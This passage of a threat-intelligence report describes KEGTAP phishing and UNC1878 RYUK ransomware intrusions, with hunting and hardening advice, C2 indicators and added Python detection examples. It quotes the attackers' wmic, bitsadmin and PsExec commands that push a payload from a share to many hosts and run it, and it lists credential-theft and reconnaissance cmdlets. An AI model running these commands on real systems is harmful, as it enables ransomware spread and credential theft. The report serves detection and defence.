  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfig, findstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt.
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.
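The five job traits listed above can be checked mechanically once the job listing is collected. The following is an added example, not Mandiant's tooling: it parses a constructed listing modelled on verbose bitsadmin output (the field labels are an assumption to confirm on your own hosts) and flags jobs that carry a notification command plus at least two other traits, a threshold chosen here for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample laid out like `bitsadmin /list /allusers /verbose` output.
# The field labels are an assumption; confirm them against your own hosts.
SAMPLE_LISTING = r"""
GUID: {11111111-2222-3333-4444-555555555555} DISPLAY: 'Adobe Update'
TYPE: DOWNLOAD STATE: TRANSIENT_ERROR OWNER: EXAMPLE\jdoe
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 2
RETRY DELAY: 60 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 41
JOB FILES:
    0 / UNKNOWN WORKING http://127.0.0.1/update.dat -> C:\Users\jdoe\AppData\Local\Temp\update.dat
NOTIFICATION COMMAND LINE: 'C:\Windows\System32\cmd.exe' '/c move C:\Users\jdoe\a.tmp C:\Users\jdoe\svc.exe & C:\Users\jdoe\svc.exe'

GUID: {66666666-7777-8888-9999-000000000000} DISPLAY: 'Component Updater'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: EXAMPLE\jdoe
NOTIFY INTERFACE: REGISTERED NOTIFICATION FLAGS: 3
RETRY DELAY: 600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 0
JOB FILES:
    1024 / 1024 WORKING https://updates.example.com/component.crx -> C:\Users\jdoe\AppData\Local\Temp\component.crx
NOTIFICATION COMMAND LINE: none
"""

# Display names quoted in the write-up; other generic names are possible.
KNOWN_DISPLAY_NAMES = {"adobe update", "system autoupdate"}
BG_NOTIFY_JOB_ERROR = 2  # "Fail (Status 2)" in the write-up


def _field(pattern, text):
    match = re.search(pattern, text)
    return match.group(1).strip() if match else None


def parse_jobs(listing):
    """Split a verbose listing into one dict per BITS job."""
    jobs = []
    for block in re.split(r"(?m)^(?=GUID:)", listing):
        if not block.strip().startswith("GUID:"):
            continue
        cmd = _field(r"(?m)^NOTIFICATION COMMAND LINE:[ \t]*(.*)$", block)
        jobs.append({
            "guid": _field(r"GUID:\s*(\{[^}]+\})", block),
            "display": _field(r"DISPLAY:\s*'(.*?)'", block),
            "notify_flags": int(_field(r"NOTIFICATION FLAGS:\s*(\d+)", block) or 0),
            "retry_delay": _field(r"RETRY DELAY:\s*(\d+)", block),
            "urls": re.findall(r"(\S+://\S+)\s+->", block),
            "notify_cmd": None if cmd in (None, "", "none") else cmd,
        })
    return jobs


def _is_local(url):
    host = urlsplit(url).hostname or ""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # a hostname; whether it exists needs a separate DNS check


def traits(job):
    """Return which of the five listed SINGLEMALT job traits a job shows."""
    found = []
    if (job["display"] or "").lower() in KNOWN_DISPLAY_NAMES:
        found.append("generic-display-name")
    if job["notify_flags"] == BG_NOTIFY_JOB_ERROR:
        found.append("notify-on-failure-only")
    if any(_is_local(u) for u in job["urls"]):
        found.append("local-url")
    if job["notify_cmd"]:
        found.append("notification-command")
    if job["retry_delay"] is not None:
        found.append("retry-delay-set")
    return found


def triage(listing):
    """Flag jobs that run a notification command and show two more traits."""
    report = []
    for job in parse_jobs(listing):
        found = traits(job)
        suspicious = "notification-command" in found and len(found) >= 3
        report.append({"guid": job["guid"], "display": job["display"],
                       "traits": found, "suspicious": suspicious})
    return report


if __name__ == "__main__":
    for row in triage(SAMPLE_LISTING):
        print(row)
```

Every BITS job reports a retry delay, so that trait only carries weight in combination with the others.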

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.
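The sketch below, an added example rather than code from the report, shows why the file name pattern is low fidelity on its own and how stacking on creation dates narrows it down. The file inventory, task names and the regular expressions (one reading of the two patterns quoted above) are constructed for illustration.

```python
import re
from collections import Counter
from datetime import date

# Constructed inventory of the SysWOW64 directory: (file name, creation date).
SYSWOW64_FILES = [
    ("cmd.exe", date(2019, 12, 7)),
    ("explorer.exe", date(2019, 12, 7)),      # legitimate, yet matches the name pattern
    ("taskkill.exe", date(2019, 12, 7)),      # legitimate, yet matches the name pattern
    ("notepad.exe", date(2019, 12, 7)),
    ("msiexec.exe", date(2020, 9, 8)),
    ("ntdll.dll", date(2020, 9, 8)),
    ("kernel32.dll", date(2020, 9, 8)),
    ("qkvzwpha.exe", date(2020, 10, 21)),     # constructed suspicious entry
    ("setup-helper.dll", date(2020, 10, 2)),  # lone creation date, ordinary name
]

# Constructed scheduled task names; "" stands for an unnamed task.
TASK_NAMES = ["Example Nightly Backup", "Sysdata autoupdate#48213", ""]

NAME_RE = re.compile(r"[a-z]{8}\.exe")      # <8 random lowercase chars>.exe
TASK_RE = re.compile(r".+ autoupdate#\d+")  # <directory> autoupdate#<number>


def review_syswow64(files, max_bucket=1):
    """Stack files by creation date and combine that with the name pattern.

    A creation date shared by at most `max_bucket` files is treated as rare,
    because the directory should be mostly static.
    """
    per_day = Counter(created for _, created in files)
    findings = []
    for name, created in files:
        reasons = []
        if NAME_RE.fullmatch(name):
            reasons.append("name-pattern")
        if per_day[created] <= max_bucket:
            reasons.append("rare-creation-date")
        if reasons:
            findings.append((name, reasons))
    # Files hitting both signals come first, then alphabetical for stable output.
    findings.sort(key=lambda item: (-len(item[1]), item[0]))
    return findings


def review_tasks(names):
    """Return tasks that are unnamed or follow the ANCHOR naming pattern."""
    flagged = []
    for name in names:
        if not name.strip():
            flagged.append((name, "unnamed"))
        elif TASK_RE.fullmatch(name):
            flagged.append((name, "anchor-name-pattern"))
    return flagged


if __name__ == "__main__":
    for name, reasons in review_syswow64(SYSWOW64_FILES):
        print(f"{name:20} {', '.join(reasons)}")
    for name, reason in review_tasks(TASK_NAMES):
        print(f"{name!r:30} {reason}")
```

On a real host, raise `max_bucket` to suit the size of the directory; the value 1 fits only this small sample.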

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.
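The proxy log review in the first item above can be expressed as a referrer and destination match. This is an added example, not part of the original report: the log layout and sample lines are constructed, and the domain list is an assumed mapping of the hosting services the report names.

```python
import csv
import io
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed domains for the hosting services the report names; adjust to your proxy data.
WATCHED_SERVICES = ("drive.google.com", "basecamp.com", "slack.com",
                    "trello.com", "yougile.com", "jetbrains.com")
REFERRER_HOST = "docs.google.com"

# Constructed proxy log: timestamp, client, method, url, referrer ("-" when absent).
SAMPLE_LOG = """\
2020-10-20T14:02:11Z,10.0.0.21,GET,https://docs.google.com/document/d/EXAMPLE1/preview,-
2020-10-20T14:02:40Z,10.0.0.21,GET,https://files.slack.com/files-pri/EXAMPLE/Report.exe,https://docs.google.com/document/d/EXAMPLE1/preview
2020-10-20T14:05:03Z,10.0.0.34,GET,https://trello.com/b/EXAMPLE/board,https://trello.com/
2020-10-20T14:07:19Z,10.0.0.34,GET,https://intranet.example.com/wiki,https://docs.google.com/document/d/EXAMPLE2/edit
2020-10-20T14:09:55Z,10.0.0.47,GET,https://notslack.com/download/Doc.exe,https://docs.google.com/document/d/EXAMPLE3/preview
2020-10-20T14:11:02Z,10.0.0.47,GET,https://basecamp.com/EXAMPLE/Preview.exe,https://docs.google.com.example.net/d/EXAMPLE4
2020-10-20T14:12:30Z,10.0.0.52,GET,https://DRIVE.google.com/uc?id=EXAMPLE&export=download,https://docs.google.com/document/d/EXAMPLE5/preview
"""


def _host(url):
    """Lower-cased host of a URL, or "" when the field holds no URL."""
    return (urlsplit(url).hostname or "").lower()


def _under(host, domain):
    """True for the domain itself or a subdomain, never for a lookalike."""
    return host == domain or host.endswith("." + domain)


def hunt(log_text):
    """Return requests to watched services whose referrer is a Google Docs page."""
    hits = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 5:
            continue  # skip malformed lines rather than guessing at fields
        timestamp, client, _method, url, referrer = row
        if _host(referrer) != REFERRER_HOST:
            continue
        dest = _host(url)
        if any(_under(dest, domain) for domain in WATCHED_SERVICES):
            hits.append({"time": timestamp, "client": client,
                         "dest": dest, "url": url})
    return hits


def by_client(hits):
    """Group destination hosts by client so affected users can be followed up."""
    grouped = defaultdict(list)
    for hit in hits:
        grouped[hit["client"]].append(hit["dest"])
    return dict(grouped)


if __name__ == "__main__":
    for client, dests in by_client(hunt(SAMPLE_LOG)).items():
        print(client, dests)
```

Exact host comparison keeps lookalike referrers and destinations, such as the two constructed ones in the sample, out of the results.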

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAs for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins. Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Oftentimes there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that does not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s


Code Signing Certificate CNs

  • ARTBUD RADOM SP Z O O
  • BESPOKE SOFTWARE SOLUTIONS LIMITED
  • Best Fud, OOO
  • BlueMarble GmbH
  • CHOO FSP, LLC
  • Company Megacom SP Z O O
  • ESTELLA, OOO
  • EXON RENTAL SP Z O O
  • Geksan LLC
  • GLOBAL PARK HORIZON SP Z O O
  • Infinite Programming Limited
  • James LTH d.o.o.
  • Logika OOO
  • MADAS d.o.o.
  • MUSTER PLUS SP Z O O
  • NEEDCODE SP Z O O
  • Nordkod LLC
  • NOSOV SP Z O O
  • OOO MEP
  • PLAN CORP PTY LTD
  • REGION TOURISM LLC
  • RESURS-RM OOO
  • Retalit LLC
  • Rumikon LLC
  • SNAB-RESURS, OOO
  • TARAT d.o.o.
  • TES LOGISTIKA d.o.o.
  • VAS CO PTY LTD
  • VB CORPORATE PTY. LTD.
  • VITA-DE d.o.o.

UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s


6825409698a326cc319ca40cd85a602e

10/21/20

45.153.240.194:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

10/21/20

45.153.240.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

10/21/20

45.153.240.136:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

10/23/20

45.153.240.157:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

10/23/20

45.153.240.178:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

9859a8336d097bc30e6e5c7a8279f18e

10/23/20

45.153.240.220:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

43fb2c153b59bf46cf6f67e0ddd6ef51

10/23/20

45.153.240.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

22bafb30cc3adaa84fef747d589ab235

10/23/20

45.153.241.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

31e87ba0c90bb38b986af297e4905e00

10/23/20

45.153.241.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

f8a14846b7da416b14303bced5a6418f

10/23/20

45.153.241.146:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

01abdaf870d859f9c1fd76f0b0328a2b

10/23/20

45.153.241.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

c2eaf144e21f3aef5fe4b1502d318ba6

10/23/20

45.153.241.158:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

de54af391602f3deea19cd5e1e912316

10/23/20

45.153.241.167:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

5f6fa19ffe5735ff81b0e7981a864dc8

10/23/20

45.147.231.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

ff54a7e6f51a850ef1d744d06d8e6caa

10/23/20

45.153.241.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

4cda9d0bece4f6156a80967298455bd5

10/26/20

74.118.138.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

e317485d700bf5e8cb8eea1ec6a72a1a

10/26/20

108.62.12.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

e0022cbf0dd5aa597fee73e79d2b5023

10/26/20

108.62.12.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

44e7347a522b22cdf5de658a4237ce58

10/26/20

172.241.27.65:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

cd3e51ee538610879d6fa77fa281bc6f

10/26/20

172.241.27.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

04b6aec529b3656040a68e17afdabfa4

10/26/20

172.241.27.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

200c25c2b93203392e1acf5d975d6544

10/26/20

45.153.241.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

9d7c52c79f3825baf97d1318bae3ebe2

10/27/20

45.153.241.14:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

5bae28b0d0e969af2c0eda21abe91f35

10/28/20

190.211.254.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

a1e62e7e547532831d0dd07832f61f54

10/28/20

81.17.28.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

67c7c75d396988ba7d6cd36f35def3e4

10/28/20

81.17.28.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

880e59b44e7175e62d75128accedb221

10/28/20

179.43.160.205:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

cdea09a43bef7f1679e9cd1bbeb4b657

10/28/20

179.43.158.171:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

512c6e39bf03a4240f5a2d32ee710ce5

10/28/20

179.43.133.44:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

87f3698c743f8a1296babf9fbebafa9f

10/28/20

179.43.128.5:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

10/28/20

179.43.128.3:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

10/28/20

81.17.28.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform: Endpoint Security

Signature names:

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)
  • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
  • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
  • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
  • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
  • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
  • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

Platform: Network Security and Email Security

Signature names:

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT
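
The three RYUK distribution commands quoted above share traits that a process-creation rule can key on: a host-list file passed as @file, a payload pulled from an internal share, and a copy into \windows\temp followed by a detached run of the same file. The Python sketch below is an added example, not FireEye's detection logic; the rule names, the ADMIN-WS host name and the two benign command lines are constructed for illustration.

```python
import re
from collections import defaultdict

I = re.IGNORECASE
PSEXEC = re.compile(r'\bpsexec(?:64)?(?:\.exe)?\b', I)

# Single-event rules, keyed by a hypothetical rule name.
RULES = {
    # wmic fanning "process call create" out to every host named in a file
    "wmic_remote_create_hostlist": re.compile(
        r'\bwmic(?:\.exe)?\b.*/node:@\S+.*\bprocess\s+call\s+create\b', I),
    # bitsadmin pulling a file from a UNC path (an internal share)
    "bitsadmin_unc_transfer": re.compile(
        r'\bbitsadmin(?:\.exe)?\s+/transfer\s+\S+\s+\\\\', I),
    # PsExec pointed at a host-list file (@file) instead of a single computer
    "psexec_hostlist": re.compile(r'\bpsexec(?:64)?(?:\.exe)?\b.*\s@\S+', I),
}
# PsExec-wrapped COPY from a UNC share into \windows\temp; captures the file name
STAGE = re.compile(r'\bcopy\s+"?\\\\[^"]+"?\s+"?[a-z]:\\windows\\temp\\([^\\"\s]+)', I)
# Detached (-d) PsExec run of a binary in \windows\temp; captures the file name
RUN = re.compile(r'\s-d\s.*\bcmd(?:\.exe)?\s+/c\s+"?[a-z]:\\windows\\temp\\([^\\"\s]+)', I)

# Constructed process-creation events (source host, command line). The first
# three command lines are the ones quoted in the post, redactions included;
# the last two are benign admin commands made up for contrast.
SAMPLE_EVENTS = [
    ("ADMIN-WS", r'start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"'),
    ("ADMIN-WS", r'start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"'),
    ("ADMIN-WS", r'start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe'),
    ("ADMIN-WS", r'wmic /node:SRV01 os get caption'),
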